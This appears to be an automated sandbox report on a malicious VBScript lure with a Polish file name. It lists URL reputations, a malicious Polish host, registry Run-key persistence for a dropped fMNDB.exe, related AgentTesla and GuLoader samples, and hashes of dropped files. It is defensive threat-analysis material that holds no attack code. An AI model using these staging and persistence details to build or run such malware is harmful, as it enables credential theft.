              http://mail.fiszebrandt.pl0%Avira URL Cloudsafe
              https://drive.google.com/u0%Avira URL Cloudsafe
              https://drive.googPz0%Avira URL Cloudsafe
              http://r10.o.lencr.org0#0%Avira URL Cloudsafe
              http://drive.google.com0%Avira URL Cloudsafe
              http://mail.fiszebrandt.pl0%VirustotalBrowse
              https://drive.google.0%Avira URL Cloudsafe
              https://drive.goog1%VirustotalBrowse
              https://drive.google.com/u0%VirustotalBrowse
              https://drive.go0%Avira URL Cloudsafe
              http://drive.google.com0%VirustotalBrowse
              https://drive.google.0%VirustotalBrowse
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
              https://drive.goo0%Avira URL Cloudsafe
              https://www.google.com0%Avira URL Cloudsafe
              http://drive.usercontent.google.com1%VirustotalBrowse
              https://drive.g0%Avira URL Cloudsafe
              http://crl.microsoftg0%Avira URL Cloudsafe
              https://www.google.com0%VirustotalBrowse
              https://drive.google.com/uc0%Avira URL Cloudsafe
              https://drive.goo0%VirustotalBrowse
              https://drive.google.com/0%Avira URL Cloudsafe
              https://drive.googl0%Avira URL Cloudsafe
              https://drive.google.com/uc1%VirustotalBrowse
              https://drive.google.com/uc?e0%Avira URL Cloudsafe
              https://drive.google.com/1%VirustotalBrowse
              https://drive.google.com/uc?ex2%VirustotalBrowse
              https://drive.google.com0%Avira URL Cloudsafe
              https://drive.usercontent.google.com0%Avira URL Cloudsafe
              https://drive.google.com/uc?e2%VirustotalBrowse
              https://drive.google.c0%Avira URL Cloudsafe
              https://drive.google.com/uc?0%Avira URL Cloudsafe
              http://r10.i.lencr.org/00%Avira URL Cloudsafe
              http://fiszebrandt.pl0%Avira URL Cloudsafe
              https://drive.google0%Avira URL Cloudsafe
              http://fiszebrandt.pl0%VirustotalBrowse
              https://github.com/Pester/Pester1%VirustotalBrowse
              https://drive.usercontent.google.com1%VirustotalBrowse
              https://drive.google.co0%Avira URL Cloudsafe
              https://drive.google.com1%VirustotalBrowse
              https://drive.google0%VirustotalBrowse
              https://drive.google.co0%VirustotalBrowse
              http://r10.i.lencr.org/00%VirustotalBrowse
              https://drive.google.com/uc?0%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              fiszebrandt.pl
              195.128.154.10
              truetrueunknown
              drive.google.com
              142.250.185.174
              truefalseunknown
              drive.usercontent.google.com
              142.250.74.193
              truefalseunknown
              mail.fiszebrandt.pl
              unknown
              unknowntrueunknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000010.00000002.3176265994.0000016B68565000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2912764832.00000000056CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2912764832.000000000558E000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://drive.usercontent.google.compowershell.exe, 00000010.00000002.3021739315.0000016B5A321000.00000004.00000800.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://mail.fiszebrandt.plwab.exe, 00000016.00000002.3758847608.0000000023017000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://drive.googpowershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://drive.google.com/ywab.exe, 00000016.00000002.3747116656.0000000007268000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000014.00000002.2909992435.0000000004686000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000014.00000002.2909992435.0000000004686000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://drive.google.com/uc?expowershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpfalse
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://drive.google.com/upowershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://go.micropowershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://drive.googPzpowershell.exe, 00000010.00000002.3021739315.0000016B59DBB000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://contoso.com/Licensepowershell.exe, 00000014.00000002.2912764832.000000000558E000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://contoso.com/Iconpowershell.exe, 00000014.00000002.2912764832.000000000558E000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://drive.usercontent.googhpowershell.exe, 00000010.00000002.3021739315.0000016B5A30C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://r10.o.lencr.org0#wab.exe, 00000016.00000002.3758847608.0000000023017000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000016.00000002.3759400992.0000000024FCE000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://drive.google.compowershell.exe, 00000010.00000002.3021739315.0000016B5A2E6000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://drive.google.powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://drive.gopowershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://github.com/Pester/Pesterpowershell.exe, 00000014.00000002.2909992435.0000000004686000.00000004.00000800.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://drive.goopowershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://www.google.compowershell.exe, 00000010.00000002.3021739315.0000016B589C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A30C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A2E6000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000016.00000003.2884545435.00000000072DA000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://drive.gpowershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://crl.microsoftgpowershell.exe, 00000014.00000002.2918369261.0000000007DE0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://drive.google.com/ucpowershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://aka.ms/pscore6lBpowershell.exe, 00000014.00000002.2909992435.0000000004531000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://drive.google.com/powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000016.00000002.3747116656.0000000007268000.00000004.00000020.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://x1.c.lencr.org/0wab.exe, 00000016.00000002.3758847608.0000000023017000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://x1.i.lencr.org/0wab.exe, 00000016.00000002.3758847608.0000000023017000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://drive.googlpowershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://drive.google.com/uc?epowershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpfalse
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://contoso.com/powershell.exe, 00000014.00000002.2912764832.000000000558E000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://nuget.org/nuget.exepowershell.exe, 00000010.00000002.3176265994.0000016B68565000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2912764832.00000000056CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2912764832.000000000558E000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://drive.google.compowershell.exe, 00000010.00000002.3021739315.0000016B59DBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B58726000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://drive.usercontent.google.compowershell.exe, 00000010.00000002.3021739315.0000016B5A30C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B589C8000.00000004.00000800.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://drive.google.cpowershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://aka.ms/pscore68powershell.exe, 00000010.00000002.3021739315.0000016B58501000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://apis.google.compowershell.exe, 00000010.00000002.3021739315.0000016B589C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A30C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A2E6000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000016.00000003.2884545435.00000000072DA000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://drive.google.com/uc?powershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://fiszebrandt.plwab.exe, 00000016.00000002.3758847608.0000000023017000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000010.00000002.3021739315.0000016B58501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2909992435.0000000004531000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://r10.i.lencr.org/0wab.exe, 00000016.00000002.3758847608.0000000023017000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000016.00000002.3759400992.0000000024FCE000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://drive.googlepowershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://drive.google.copowershell.exe, 00000010.00000002.3021739315.0000016B597D6000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              142.250.185.174
              drive.google.comUnited States
              15169GOOGLEUSfalse
              142.250.74.193
              drive.usercontent.google.comUnited States
              15169GOOGLEUSfalse
              195.128.154.10
              fiszebrandt.plPoland
              201814PL-SKYTECH-ASPLtrue
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1466650
              Start date and time:2024-07-03 08:42:45 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 11m 16s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:28
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:Zapytanie ofertowe (GASTRON 07022024).vbs
              Detection:MAL
              Classification:mal100.troj.spyw.expl.evad.winVBS@14/10@3/3
              EGA Information:
              • Successful, ratio: 50%
              HCA Information:
              • Successful, ratio: 90%
              • Number of executed functions: 33
              • Number of non-executed functions: 6
              Cookbook Comments:
              • Found application associated with file extension: .vbs
              • Override analysis time to 240s for JS/VBS files not yet terminated
              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 2.16.164.72, 2.16.164.67, 88.221.110.91, 2.16.100.168, 93.184.221.240
              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, time.windows.com, a767.dspw65.akamai.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net
              • Execution Graph export aborted for target powershell.exe, PID 4704 because it is empty
              • Execution Graph export aborted for target powershell.exe, PID 7004 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              TimeTypeDescription
              02:43:41API Interceptor1x Sleep call for process: wscript.exe modified
              03:52:24API Interceptor401x Sleep call for process: powershell.exe modified
              03:53:03API Interceptor28x Sleep call for process: wab.exe modified
              09:53:03AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run fMNDB C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe
              09:53:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run fMNDB C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              195.128.154.10ZDUplikowane faktury 420987654rt.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                PL-SKYTECH-ASPLIxbhndGpFV.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                • 195.3.223.218
                https://www.upload.ee/files/16753014/KingMail_v1.1_Crack.zip.htmlGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                • 195.3.223.218
                ZDUplikowane faktury 420987654rt.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                • 195.128.154.10
                Adro_ Documents.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                • 91.223.3.151
                SecuriteInfo.com.Trojan.PWS.Stealer.36926.32356.23713.exeGet hashmaliciousUnknownBrowse
                • 195.3.223.218
                SecuriteInfo.com.Trojan.PWS.Stealer.36926.30402.31658.exeGet hashmaliciousUnknownBrowse
                • 195.3.223.218
                c8sDO7umrx.exeGet hashmaliciousCMSBruteBrowse
                • 95.214.52.187
                SHEOrder-10524.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                • 91.223.3.151
                BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                • 193.34.212.49
                00kDn01FGP.elfGet hashmaliciousMiraiBrowse
                • 5.181.190.250
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                3b5074b1b5d032e5620f69f9f700ff0eB24E33 ENQUIRY.vbeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                • 142.250.185.174
                • 142.250.74.193
                Purchase Order N#U00b0 20240702.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                • 142.250.185.174
                • 142.250.74.193
                AWB 3609 961.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                • 142.250.185.174
                • 142.250.74.193
                MT_0615_60931PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                • 142.250.185.174
                • 142.250.74.193
                Doc230906103882.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                • 142.250.185.174
                • 142.250.74.193
                birectangular.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                • 142.250.185.174
                • 142.250.74.193
                AWB#276097479258.pdf.htmlGet hashmaliciousUnknownBrowse
                • 142.250.185.174
                • 142.250.74.193
                payment.exeGet hashmaliciousSnake KeyloggerBrowse
                • 142.250.185.174
                • 142.250.74.193
                Doc_CI_PL_HBL_COO_Insu_.exeGet hashmaliciousAgentTeslaBrowse
                • 142.250.185.174
                • 142.250.74.193
                roger.exeGet hashmaliciousAgentTeslaBrowse
                • 142.250.185.174
                • 142.250.74.193
                37f463bf4616ecd445d4a1937da06e19Purchase Order N#U00b0 20240702.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                • 142.250.185.174
                • 142.250.74.193
                birectangular.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                • 142.250.185.174
                • 142.250.74.193
                SecuriteInfo.com.Adware.DownwareNET.4.16171.10714.exeGet hashmaliciousUnknownBrowse
                • 142.250.185.174
                • 142.250.74.193
                SecuriteInfo.com.Adware.DownwareNET.4.16171.10714.exeGet hashmaliciousUnknownBrowse
                • 142.250.185.174
                • 142.250.74.193
                file.exeGet hashmaliciousVidarBrowse
                • 142.250.185.174
                • 142.250.74.193
                FmQx1Fw3VA.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                • 142.250.185.174
                • 142.250.74.193
                config.lnk.mal.lnkGet hashmaliciousCredGrabber, Meduza StealerBrowse
                • 142.250.185.174
                • 142.250.74.193
                invoicepast.pdf.lnk.mal.lnkGet hashmaliciousScreenConnect ToolBrowse
                • 142.250.185.174
                • 142.250.74.193
                Invoice-UPS-218931.pdf.lnk.mal.lnkGet hashmaliciousUnknownBrowse
                • 142.250.185.174
                • 142.250.74.193
                IF10339.pdf.lnk.mal.lnkGet hashmaliciousUnknownBrowse
                • 142.250.185.174
                • 142.250.74.193
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exePurchase Order N#U00b0 20240702.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                  New Order CHAL-0435.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                    FA46969-OVERSEAS 2024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                      staff record or employee record.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                        Inquiry-N#U00b0 3079-24-06.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                          Inquiry-N#U00b0 3079-24-06.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            Salary List.xls.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                              temp2.vbsGet hashmaliciousGuLoaderBrowse
                                temp2.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                  Flab 423800-213-KFO-872-1-9.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                    Process:C:\Windows\System32\wscript.exe
                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                    Category:dropped
                                    Size (bytes):71954
                                    Entropy (8bit):7.996617769952133
                                    Encrypted:true
                                    SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                    MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                    SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                    SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                    SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                    Process:C:\Windows\System32\wscript.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):328
                                    Entropy (8bit):3.137989037915285
                                    Encrypted:false
                                    SSDEEP:6:kK8F9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:9DnLNkPlE99SNxAhUe/3
                                    MD5:BB89FCCE029C0095CEA80460163F97C5
                                    SHA1:CD08016243779BB92EB0D2B7ECC3E9409DBE8043
                                    SHA-256:6C638C5C2BC2B7025CC313022D2678D39394EA032ADCFCEE140C8F178A9CA920
                                    SHA-512:090D4C2B93A84E1F689CD8DC8575869295DAF67C4A7A48ECBAB027CADEAAA2814F859B9B1D79661DD514775313F9D42DB02482D460BD64782FC8759C2632ACFD
                                    Malicious:false
                                    Preview:p...... .........@W....(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):11608
                                    Entropy (8bit):4.8908305915084105
                                    Encrypted:false
                                    SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                    MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                    SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                    SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                    SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                    Malicious:false
                                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):1.1940658735648508
                                    Encrypted:false
                                    SSDEEP:3:Nlllulbnolz:NllUc
                                    MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                    SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                    SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                    SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                    Malicious:false
                                    Preview:@...e................................................@..........
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
